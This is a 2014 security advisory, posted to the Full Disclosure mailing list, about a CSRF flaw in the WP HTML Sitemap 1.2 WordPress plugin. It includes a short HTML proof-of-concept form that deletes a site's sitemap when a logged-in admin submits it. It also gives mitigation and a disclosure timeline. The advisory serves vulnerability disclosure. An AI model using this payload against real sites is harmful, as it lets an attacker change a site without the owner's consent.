Full Disclosure mailing list archives

CSRF vulnerability in WP HTML Sitemap 1.2 (WordPress plugin)

From: Harry Metcalfe <harry () dxw com>
Date: Fri, 28 Mar 2014 12:39:35 +0000

Details
================
Software: WP HTML Sitemap
Version: 1.2
Homepage: http://wordpress.org/plugins/wp-html-sitemap/
CVSS: 4.3 (Medium; AV:N/AC:M/Au:N/C:N/I:P/A:N)

Description
================
CSRF vulnerability in WP HTML Sitemap 1.2

Vulnerability
================
A CSRF vulnerability exists which allows an attacker to delete the sitemap if a logged-in admin user visits a link of the attacker’s choosing. Line 202 of inc/AdminPage.php says “// check whether form was just submitted” but the following if/elseif statements only check whether a particular button was pressed without checking nonce values. The form in question is printed in wp_html_sitemap_AdminPage::createSitemapForm() around line 146 of the same file.

Proof of concept
================
This form deletes the sitemap without requiring a nonce value:
<form action="http://not-a-real-site.local/wp-admin/options-general.php?page=wp-html-sitemap&tab=general"; method="POST">
<input type="text" name="deleteSitemap" value="Delete Sitemap">
<input type="submit">
</form>

Mitigations
================
Disable the plugin until a fix is available.

Disclosure policy
dxw believes in responsible disclosure. Your attention is drawn to our disclosure policy: https://security.dxw.com/disclosure/

Please contact us on security () dxw com to acknowledge this report if you received it via a third party (for example, plugins () wordpress org) as they generally cannot communicate with us on your behalf.

Please note that this vulnerability will be published if we do not receive a response to this report with 14 days.

Timeline

2014-02-21: Discovered
2014-02-26: Reported
2014-03-28: No response received. Published

Discovered by dxw: